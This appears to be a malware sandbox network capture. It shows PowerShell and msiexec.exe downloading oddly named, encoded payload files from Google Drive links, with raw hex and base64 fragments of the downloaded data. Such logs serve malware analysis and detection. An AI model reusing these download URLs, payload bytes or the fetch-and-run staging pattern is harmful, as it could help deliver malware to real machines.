                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-MstZE2ex4JO1nWy6hDWQig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                  Server: ESF
                                                                                                  Content-Length: 0
                                                                                                  X-XSS-Protection: 0
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                  Connection: close


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.2.1049687142.250.186.1614434504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-03-10 19:37:45 UTC139OUTGET /download?id=1i7dwfRPhv9u6AAd6irYY63bwGYe4-0QC&export=download HTTP/1.1
                                                                                                  Host: drive.usercontent.google.com
                                                                                                  Connection: Keep-Alive
                                                                                                  2025-03-10 19:37:48 UTC5016INHTTP/1.1 200 OK
                                                                                                  X-GUploader-UploadID: AKDAyIt1qfrmS84V_lD1AoG_HZunGBGZjyKMAibCDWaqsS-pf_6eQ_5ucpWC3e3jM7YhBDEt
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Security-Policy: sandbox
                                                                                                  Content-Security-Policy: default-src 'none'
                                                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  Content-Disposition: attachment; filename="Ssonsvingningers.thn"
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                  Accept-Ranges: bytes
                                                                                                  Content-Length: 485912
                                                                                                  Last-Modified: Mon, 10 Mar 2025 09:49:25 GMT
                                                                                                  Date: Mon, 10 Mar 2025 19:37:47 GMT
                                                                                                  Expires: Mon, 10 Mar 2025 19:37:47 GMT
                                                                                                  Cache-Control: private, max-age=0
                                                                                                  X-Goog-Hash: crc32c=5Ac2iw==
                                                                                                  Server: UploadServer
                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                  Connection: close
                                                                                                  2025-03-10 19:37:48 UTC5016INData Raw: 5a 6a 32 67 36 59 50 41 41 4c 74 4b 38 78 30 41 67 38 67 41 5a 6a 31 38 6e 51 4e 63 4a 41 51 67 32 35 43 35 54 63 78 4d 77 32 59 68 77 47 61 44 78 77 43 42 38 61 47 73 50 55 46 6d 67 38 4d 41 68 4d 6d 42 36 65 78 67 63 59 4c 34 4c 41 42 6d 67 38 73 41 68 4d 43 36 73 4d 63 50 32 57 61 44 36 67 41 68 30 6f 44 42 41 50 77 78 79 6f 50 44 41 49 44 7a 41 49 6b 55 43 34 50 4b 41 4d 48 75 41 4e 48 69 77 65 63 41 6d 34 50 42 42 50 79 44 39 67 43 42 2b 58 5a 66 35 67 46 38 31 6f 50 4a 41 47 59 68 32 34 74 45 4a 41 53 62 5a 6f 50 33 41 49 6e 44 49 66 5a 6d 67 38 73 41 67 63 50 52 2b 38 63 42 5a 6f 50 50 41 49 50 4b 41 4c 70 65 57 68 68 7a 6b 4d 48 75 41 49 48 79 73 74 53 6d 73 6f 44 71 41 49 44 4a 41 49 48 71 37 49 36 2b 77 57 61 46 32 32 62 42 34 41 43 46 77 44 51
                                                                                                  Data Ascii: Zj2g6YPAALtK8x0Ag8gAZj18nQNcJAQg25C5TcxMw2YhwGaDxwCB8aGsPUFmg8MAhMmB6exgcYL4LABmg8sAhMC6sMcP2WaD6gAh0oDBAPwxyoPDAIDzAIkUC4PKAMHuANHiwecAm4PBBPyD9gCB+XZf5gF81oPJAGYh24tEJASbZoP3AInDIfZmg8sAgcPR+8cBZoPPAIPKALpeWhhzkMHuAIHystSmsoDqAIDJAIHq7I6+wWaF22bB4ACFwDQ
                                                                                                  2025-03-10 19:37:48 UTC4664INData Raw: 45 70 39 74 62 50 55 68 4e 57 4d 69 55 30 50 64 59 2b 52 34 77 36 71 79 31 59 51 58 61 37 76 41 71 4e 59 4b 46 4d 64 33 6d 45 5a 4d 36 6a 6a 45 42 2f 42 51 7a 76 6e 39 55 6b 64 4d 56 4d 51 6f 4d 75 58 52 67 63 4e 63 7a 6b 4f 2f 35 5a 64 31 54 4f 70 51 52 30 7a 71 55 45 64 4d 36 6c 42 48 54 4f 70 51 52 30 7a 71 55 45 64 4d 36 6c 42 48 54 46 35 58 73 51 59 76 52 4d 57 4a 66 57 34 48 73 46 64 4e 4d 79 69 42 31 70 56 71 2b 65 50 47 75 68 31 65 6e 69 64 72 70 6f 5a 6b 4c 69 38 52 48 6c 44 32 78 36 59 4b 30 59 55 41 4a 4a 75 74 7a 53 6a 66 4d 33 72 36 30 62 58 4e 4b 4c 79 63 48 58 62 5a 70 6b 58 37 7a 53 46 31 49 43 6c 43 6b 63 65 46 57 76 73 32 70 64 63 52 2f 6b 37 4a 69 75 4b 2b 43 31 64 37 48 55 65 56 32 73 68 66 78 6d 78 4d 36 77 63 48 62 39 6a 2b 4c 77 35
                                                                                                  Data Ascii: Ep9tbPUhNWMiU0PdY+R4w6qy1YQXa7vAqNYKFMd3mEZM6jjEB/BQzvn9UkdMVMQoMuXRgcNczkO/5Zd1TOpQR0zqUEdM6lBHTOpQR0zqUEdM6lBHTF5XsQYvRMWJfW4HsFdNMyiB1pVq+ePGuh1enidrpoZkLi8RHlD2x6YK0YUAJJutzSjfM3r60bXNKLycHXbZpkX7zSF1IClCkceFWvs2pdcR/k7JiuK+C1d7HUeV2shfxmxM6wcHb9j+Lw5
                                                                                                  2025-03-10 19:37:48 UTC1324INData Raw: 57 46 6a 73 63 2b 78 38 73 47 57 35 42 2f 4e 4d 6d 71 6e 47 73 41 50 38 69 43 75 56 76 63 30 5a 36 68 6b 33 49 4e 47 30 6d 54 55 38 70 63 30 70 42 59 64 68 78 77 66 62 78 51 31 52 57 4e 48 54 6e 7a 42 4f 78 78 37 57 6c 67 4e 42 56 59 51 4e 62 44 35 48 43 50 63 65 45 46 70 61 32 69 61 6a 45 78 44 4d 4a 64 70 6f 2b 58 4d 53 68 70 6d 73 4b 4c 37 53 63 67 4d 35 33 58 62 6b 67 63 34 4e 4f 36 6d 49 6a 4b 65 42 42 57 30 50 77 70 57 78 32 66 71 48 36 31 42 48 67 4b 69 62 78 67 43 74 79 46 2f 2b 57 79 57 42 44 63 6b 6e 47 79 59 77 32 32 47 74 6e 76 51 63 70 44 68 65 66 2b 68 44 6b 75 52 70 79 54 4a 33 42 53 36 67 69 52 79 51 6a 6d 6e 33 2f 4f 2b 68 67 33 32 56 78 72 75 34 33 6d 48 44 75 4f 6f 72 50 66 77 56 78 71 62 6a 36 67 39 34 61 37 70 73 50 2f 6c 76 78 72 36
                                                                                                  Data Ascii: WFjsc+x8sGW5B/NMmqnGsAP8iCuVvc0Z6hk3ING0mTU8pc0pBYdhxwfbxQ1RWNHTnzBOxx7WlgNBVYQNbD5HCPceEFpa2iajExDMJdpo+XMShpmsKL7ScgM53Xbkgc4NO6mIjKeBBW0PwpWx2fqH61BHgKibxgCtyF/+WyWBDcknGyYw22GtnvQcpDhef+hDkuRpyTJ3BS6giRyQjmn3/O+hg32Vxru43mHDuOorPfwVxqbj6g94a7psP/lvxr6
                                                                                                  2025-03-10 19:37:48 UTC1342INData Raw: 70 6b 58 72 7a 58 36 7a 6d 46 4e 38 6d 47 79 46 30 62 6b 2f 35 7a 78 46 79 55 4d 6a 5a 58 34 65 48 78 45 61 75 62 6c 53 56 46 49 53 56 38 4c 6c 30 6c 46 69 35 79 64 62 76 35 6d 70 6f 6d 77 50 37 65 4b 36 71 50 34 44 6e 5a 4a 2f 71 37 50 55 75 52 52 68 46 51 4d 64 55 37 69 4d 68 53 6a 52 74 71 53 38 45 71 7a 4e 41 2b 5a 66 6f 74 37 52 74 6f 59 58 51 31 50 4e 41 39 41 2f 77 67 6f 41 32 38 55 4b 57 55 2f 52 30 70 67 7a 61 65 35 78 67 51 46 77 75 76 34 4f 53 75 39 39 36 74 39 6c 5a 79 52 79 43 72 45 62 64 43 65 2f 4b 30 6b 34 67 75 4f 4f 63 51 30 4d 36 34 74 79 43 73 34 71 73 59 6d 52 43 48 36 63 73 78 41 55 39 79 56 74 72 73 52 72 6f 30 6f 4e 57 39 76 47 76 36 6b 33 48 38 4e 72 6f 33 63 67 36 74 7a 4f 54 7a 6e 4a 6e 44 34 6b 74 73 5a 59 31 64 56 4a 6a 67 49
                                                                                                  Data Ascii: pkXrzX6zmFN8mGyF0bk/5zxFyUMjZX4eHxEaublSVFISV8Ll0lFi5ydbv5mpomwP7eK6qP4DnZJ/q7PUuRRhFQMdU7iMhSjRtqS8EqzNA+Zfot7RtoYXQ1PNA9A/wgoA28UKWU/R0pgzae5xgQFwuv4OSu996t9lZyRyCrEbdCe/K0k4guOOcQ0M64tyCs4qsYmRCH6csxAU9yVtrsRro0oNW9vGv6k3H8Nro3cg6tzOTznJnD4ktsZY1dVJjgI
                                                                                                  2025-03-10 19:37:48 UTC1342INData Raw: 64 45 70 45 4b 37 39 73 70 31 5a 41 2f 47 65 4d 35 71 2f 59 64 77 58 34 42 38 39 46 42 48 54 4f 70 51 52 30 7a 71 55 45 64 4d 36 6c 42 48 54 4f 70 51 52 30 7a 71 55 45 64 4d 36 6c 44 73 4a 76 6f 2f 44 2b 58 72 44 44 66 46 71 67 46 36 2f 4f 50 52 61 32 6a 64 74 45 50 65 67 6b 52 43 6a 73 57 63 64 2f 63 62 41 38 49 41 68 56 54 4e 65 45 79 59 50 68 66 58 66 2f 68 77 79 54 78 65 59 45 6e 46 38 62 37 36 73 2f 42 6b 62 72 38 37 35 6b 49 70 4c 59 68 36 6d 44 47 44 6b 42 2b 35 51 44 2f 52 63 32 6a 2f 61 56 5a 6f 35 5a 64 35 50 75 70 51 52 30 7a 71 55 45 64 4d 36 6c 42 48 54 4f 70 51 52 30 7a 71 55 45 64 4d 36 6c 42 48 54 4f 72 6c 6e 30 77 48 47 77 42 36 4d 76 7a 78 4c 4f 47 4a 4f 31 4c 35 6a 2b 35 42 5a 79 4c 47 65 4d 37 30 33 58 36 66 41 76 31 77 4d 4e 56 76 7a
                                                                                                  Data Ascii: dEpEK79sp1ZA/GeM5q/YdwX4B89FBHTOpQR0zqUEdM6lBHTOpQR0zqUEdM6lDsJvo/D+XrDDfFqgF6/OPRa2jdtEPegkRCjsWcd/cbA8IAhVTNeEyYPhfXf/hwyTxeYEnF8b76s/Bkbr875kIpLYh6mDGDkB+5QD/Rc2j/aVZo5Zd5PupQR0zqUEdM6lBHTOpQR0zqUEdM6lBHTOrln0wHGwB6MvzxLOGJO1L5j+5BZyLGeM703X6fAv1wMNVvz
                                                                                                  2025-03-10 19:37:48 UTC1342INData Raw: 7a 52 69 30 61 63 71 7a 30 62 58 4a 52 5a 4e 6c 7a 52 6a 57 69 74 78 4e 41 39 76 46 43 56 6c 55 30 64 4f 6a 4e 45 37 76 35 64 7a 77 61 4d 44 75 78 58 5a 37 35 61 73 4d 30 79 6e 4e 63 39 6c 47 62 50 6a 7a 42 75 69 30 43 6e 58 69 73 56 36 46 62 41 59 6d 76 61 54 6e 64 57 49 71 61 36 39 78 73 62 45 32 77 70 32 77 41 76 33 53 6d 68 43 70 7a 52 68 71 59 6a 75 31 30 62 57 54 34 6e 54 49 7a 52 67 4a 33 36 4a 6b 30 62 56 75 4c 71 33 33 48 58 62 5a 70 6b 33 37 7a 63 4f 46 6e 57 43 65 49 6a 62 49 4a 56 69 50 77 50 34 56 53 71 4b 74 6c 70 48 74 65 50 31 4d 47 37 69 71 33 50 78 69 44 57 6a 69 2f 44 67 45 61 37 41 7a 6b 7a 7a 4b 43 30 63 7a 79 35 33 56 66 72 4a 45 2b 68 79 59 62 44 4a 6f 73 78 56 72 4c 54 4e 39 69 6c 42 48 51 32 66 47 35 30 7a 71 43 73 61 69 32 64 56
                                                                                                  Data Ascii: zRi0acqz0bXJRZNlzRjWitxNA9vFCVlU0dOjNE7v5dzwaMDuxXZ75asM0ynNc9lGbPjzBui0CnXisV6FbAYmvaTndWIqa69xsbE2wp2wAv3SmhCpzRhqYju10bWT4nTIzRgJ36Jk0bVuLq33HXbZpk37zcOFnWCeIjbIJViPwP4VSqKtlpHteP1MG7iq3PxiDWji/DgEa7AzkzzKC0czy53VfrJE+hyYbDJosxVrLTN9ilBHQ2fG50zqCsai2dV
                                                                                                  2025-03-10 19:37:48 UTC1342INData Raw: 69 34 6e 6d 57 6d 4b 77 71 39 66 30 46 61 36 33 2f 35 42 57 5a 36 64 63 2f 53 2f 53 68 41 45 36 59 62 75 57 32 69 35 64 45 72 45 6e 2b 78 73 74 47 2b 43 39 6f 4b 4e 78 65 37 32 38 71 4a 36 31 42 48 48 6c 41 47 44 74 71 58 30 62 57 33 6f 34 49 78 7a 52 69 58 5a 74 35 30 30 59 58 78 76 6f 59 30 7a 53 69 4a 7a 52 38 63 42 39 76 46 44 56 46 51 30 59 7a 56 68 6a 76 49 64 4c 66 4d 58 34 69 38 74 79 6d 6f 37 57 33 56 43 41 43 2f 4e 4f 43 49 57 66 44 64 47 6a 49 4c 76 65 62 56 57 49 6b 6f 72 4d 66 37 72 58 30 4c 55 41 45 64 42 50 66 67 59 6d 58 58 42 79 4c 68 36 69 43 58 61 71 30 2f 45 32 36 4b 48 63 56 6e 35 45 5a 4d 36 74 6d 65 48 51 4f 34 52 30 7a 71 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                  Data Ascii: i4nmWmKwq9f0Fa63/5BWZ6dc/S/ShAE6YbuW2i5dErEn+xstG+C9oKNxe728qJ61BHHlAGDtqX0bW3o4IxzRiXZt500YXxvoY0zSiJzR8cB9vFDVFQ0YzVhjvIdLfMX4i8tymo7W3VCAC/NOCIWfDdGjILvebVWIkorMf7rX0LUAEdBPfgYmXXByLh6iCXaq0/E26KHcVn5EZM6tmeHQO4R0zqAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                  2025-03-10 19:37:48 UTC1342INData Raw: 6f 73 2f 52 54 4f 70 66 77 38 51 5a 55 55 63 56 30 39 56 67 54 75 70 51 7a 4d 6e 4e 55 6b 64 4d 35 64 31 78 53 4f 70 51 45 50 4f 67 34 6f 34 68 61 36 63 66 72 66 30 54 78 72 75 75 75 48 49 33 61 36 63 51 65 51 45 46 7a 6b 4e 4b 6a 43 36 2b 49 2f 67 47 74 46 75 76 6c 74 55 4d 54 62 54 56 73 76 44 57 2f 54 39 74 44 35 48 2f 44 57 37 6f 32 70 39 43 79 48 67 50 7a 73 6d 4b 55 6b 64 4d 47 56 2b 41 65 75 70 51 52 30 7a 71 55 45 64 4d 36 6c 42 48 54 4f 70 51 52 30 7a 71 55 45 64 4d 36 6c 42 48 54 4f 72 31 56 49 47 63 79 66 2f 4c 2f 49 4c 56 65 64 51 6a 52 4a 66 6c 55 56 67 33 36 6c 42 48 54 4f 70 51 52 30 7a 71 55 45 64 4d 36 6c 42 48 54 4f 70 51 52 30 7a 71 55 45 64 4d 36 75 48 6d 47 2f 6e 6c 63 47 4b 73 61 69 6d 4a 39 4f 73 68 61 33 64 33 73 71 42 76 75 62 57
                                                                                                  Data Ascii: os/RTOpfw8QZUUcV09VgTupQzMnNUkdM5d1xSOpQEPOg4o4ha6cfrf0TxruuuHI3a6cQeQEFzkNKjC6+I/gGtFuvltUMTbTVsvDW/T9tD5H/DW7o2p9CyHgPzsmKUkdMGV+AeupQR0zqUEdM6lBHTOpQR0zqUEdM6lBHTOr1VIGcyf/L/ILVedQjRJflUVg36lBHTOpQR0zqUEdM6lBHTOpQR0zqUEdM6uHmG/nlcGKsaimJ9Osha3d3sqBvubW
                                                                                                  2025-03-10 19:37:48 UTC1342INData Raw: 62 44 36 6c 42 48 54 4f 70 51 52 30 7a 71 55 45 64 4d 36 6c 42 48 54 4f 70 51 52 30 7a 71 55 45 64 4d 36 76 54 4a 70 39 32 68 42 59 37 69 55 42 48 79 41 67 58 4c 66 47 75 6d 56 79 70 78 64 73 61 36 38 54 37 39 68 47 75 2b 32 76 78 47 6a 73 35 43 6c 52 4b 45 59 6b 76 6c 6e 4e 58 67 58 77 46 38 52 79 71 32 55 55 76 44 5a 43 36 35 30 47 7a 38 37 67 38 47 34 72 52 74 76 44 58 75 49 67 37 37 68 2b 33 69 45 72 33 76 5a 45 35 31 58 63 61 37 70 4a 62 44 4c 57 75 6e 6d 69 37 5a 43 63 61 6a 57 76 56 76 65 62 6e 4d 7a 71 2f 6a 61 39 72 4a 45 69 39 57 72 44 45 75 36 6b 4e 36 6f 61 4a 53 69 54 63 43 78 70 61 74 5a 55 43 6f 44 7a 76 59 64 4b 6f 72 63 61 35 64 34 33 6a 77 42 38 34 2f 51 39 39 56 77 4d 73 4c 77 35 65 31 32 78 4a 6f 35 5a 64 32 66 4f 70 51 52 30 7a 71 55
                                                                                                  Data Ascii: bD6lBHTOpQR0zqUEdM6lBHTOpQR0zqUEdM6vTJp92hBY7iUBHyAgXLfGumVypxdsa68T79hGu+2vxGjs5ClRKEYkvlnNXgXwF8Ryq2UUvDZC650Gz87g8G4rRtvDXuIg77h+3iEr3vZE51Xca7pJbDLWunmi7ZCcajWvVvebnMzq/ja9rJEi9WrDEu6kN6oaJSiTcCxpatZUCoDzvYdKorca5d43jwB84/Q99VwMsLw5e12xJo5Zd2fOpQR0zqU
                                                                                                  2025-03-10 19:37:48 UTC1342INData Raw: 55 67 41 36 57 39 6a 74 4b 7a 48 42 44 75 36 42 4a 6d 63 56 51 51 49 6b 79 43 4d 50 77 6f 2b 79 4f 4a 38 46 32 64 43 4c 49 57 4d 32 6c 4b 48 59 68 36 46 38 33 51 2f 64 43 6c 68 32 63 7a 30 69 6f 2b 62 36 4e 36 72 53 4f 53 66 33 7a 75 6a 73 63 7a 2b 31 7a 67 62 35 7a 38 63 59 77 4d 30 63 47 4c 68 37 77 74 47 42 35 64 2f 51 46 38 58 6b 4d 35 70 61 32 55 53 63 62 7a 66 4a 65 36 34 56 55 45 32 6d 33 4f 2f 36 37 34 73 35 36 56 50 2b 36 39 4d 65 51 71 52 6d 67 52 4d 57 73 30 59 6b 2b 44 67 39 6f 69 45 2b 55 6a 63 52 47 63 33 65 64 44 39 37 6f 67 62 47 65 4d 37 48 39 31 52 48 58 34 42 32 31 46 42 48 54 4f 70 51 52 30 7a 71 55 45 64 4d 36 6c 42 48 54 4f 70 51 52 30 7a 71 55 45 64 4d 36 6c 44 7a 62 6a 5a 49 6b 62 68 64 66 32 4c 4e 2b 6c 6d 6c 59 76 2f 42 5a 53 58
                                                                                                  Data Ascii: UgA6W9jtKzHBDu6BJmcVQQIkyCMPwo+yOJ8F2dCLIWM2lKHYh6F83Q/dClh2cz0io+b6N6rSOSf3zujscz+1zgb5z8cYwM0cGLh7wtGB5d/QF8XkM5pa2UScbzfJe64VUE2m3O/674s56VP+69MeQqRmgRMWs0Yk+Dg9oiE+UjcRGc3edD97ogbGeM7H91RHX4B21FBHTOpQR0zqUEdM6lBHTOpQR0zqUEdM6lDzbjZIkbhdf2LN+lmlYv/BZSX


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  3192.168.2.1049696142.250.186.1744437632C:\Windows\SysWOW64\msiexec.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-03-10 19:38:34 UTC216OUTGET /uc?export=download&id=1lG2PFpFYkSI6X_VCBq4gFHA1GeoYlhZf HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                                  Host: drive.google.com
                                                                                                  Cache-Control: no-cache
                                                                                                  2025-03-10 19:38:35 UTC1610INHTTP/1.1 303 See Other
                                                                                                  Content-Type: application/binary
                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                  Date: Mon, 10 Mar 2025 19:38:35 GMT
                                                                                                  Location: https://drive.usercontent.google.com/download?id=1lG2PFpFYkSI6X_VCBq4gFHA1GeoYlhZf&export=download
                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                  Content-Security-Policy: script-src 'nonce-KZEGFI0O_qP6nRpn2KVZQg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                  Server: ESF
                                                                                                  Content-Length: 0
                                                                                                  X-XSS-Protection: 0
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                  Connection: close


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  4192.168.2.1049697142.250.186.1614437632C:\Windows\SysWOW64\msiexec.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-03-10 19:38:37 UTC258OUTGET /download?id=1lG2PFpFYkSI6X_VCBq4gFHA1GeoYlhZf&export=download HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                                  Cache-Control: no-cache
                                                                                                  Host: drive.usercontent.google.com
                                                                                                  Connection: Keep-Alive
                                                                                                  2025-03-10 19:38:40 UTC5026INHTTP/1.1 200 OK
                                                                                                  X-GUploader-UploadID: AKDAyIuoQu0Nq9ykIwZS-JHVd7aNTqSJUvmr6_Amh-u_HkQsme-LSPhlxAsF_ID0jEsbz7cLf-5no3A
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Security-Policy: sandbox
                                                                                                  Content-Security-Policy: default-src 'none'
                                                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  Content-Disposition: attachment; filename="NMhUXuRfGGJkMrCU201.bin"
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                  Accept-Ranges: bytes
                                                                                                  Content-Length: 498752
                                                                                                  Last-Modified: Mon, 10 Mar 2025 06:24:48 GMT
                                                                                                  Date: Mon, 10 Mar 2025 19:38:40 GMT
                                                                                                  Expires: Mon, 10 Mar 2025 19:38:40 GMT
                                                                                                  Cache-Control: private, max-age=0
                                                                                                  X-Goog-Hash: crc32c=qcQOEw==
                                                                                                  Server: UploadServer
                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                  Connection: close
                                                                                                  2025-03-10 19:38:40 UTC5026INData Raw: e6 d1 f6 f7 5c fd 4c e9 c4 2c 15 b7 65 5d 32 32 4e 3a 2a 7d 58 1a 6a 6f 90 bd 42 aa 67 5d f8 1f 1f d2 b8 ec 8e 39 82 35 ef 06 86 c3 6b ab 17 dd 98 58 18 27 35 bd a5 a3 72 54 05 ad 40 80 f6 a9 ad 0c 1f 46 50 f2 54 3c 33 bd 3b 11 1b c4 ad 9b e9 e6 18 52 76 db c2 49 a3 79 94 46 ba 9f c9 c6 6e 32 81 b7 3c 17 42 42 91 0f d7 d9 d9 81 c3 c4 85 c8 62 90 c2 dd f2 64 f7 4c ef 8a 88 a8 c9 b1 82 1d e4 9d 59 87 f0 a3 fc 8d ed b7 e5 fe 35 df 4d ce ea aa 54 b6 1f bd ad 72 30 94 26 87 3b fa 2b 67 b2 de 16 9c 4a 28 67 c3 57 ee aa bf c4 67 9c b9 bd be 0b c8 19 90 29 a8 5e 3f 6d b0 3e 7e 74 4a 74 d9 22 d6 14 a9 2b 6c 79 46 db 25 98 c7 42 79 69 60 1b 6b 47 5d 89 cd 7d 86 9a b9 24 84 43 fb 9c 75 5d 77 b7 e3 61 7c 68 61 27 27 01 bc c2 50 74 c1 ef 81 80 42 91 6b 4d 55 77 0b 7d
                                                                                                  Data Ascii: \L,e]22N:*}XjoBg]95kX'5rT@FPT<3;RvIyFn2<BBbdLY5MTr0&;+gJ(gWg)^?m>~tJt"+lyF%Byi`kG]}$Cu]wa|ha''PtBkMUw}
